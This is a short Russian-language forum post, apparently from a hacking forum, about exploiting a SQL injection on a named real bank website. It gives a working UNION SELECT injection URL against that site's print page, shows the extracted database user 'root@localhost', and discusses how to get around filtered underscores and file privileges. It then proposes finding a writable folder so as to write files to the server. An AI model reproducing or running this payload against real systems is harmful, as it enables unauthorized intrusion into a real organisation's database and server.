MirA
Забавно, действительно фильтрация "_"
Есть очень большая вероятность того, что user под которым работает база, file_priv=Y
http://www.rncb.ru/print_view.php?id=450&fpath=-2+union+select+1,2,3,UNHEX(HEX(user())),5,6,7,8,9, 10,11,12,13+from+mysql.user+--+
root@localhost

Прочитать файлы мы не сможем, т.к LOAD_FILE, и посмотреть тоже , т.к file_priv, а вот записать ...

Тоесть ищем папку на запись, и пробуем

PS
prescott,wildshaman Зачем вообще это писать?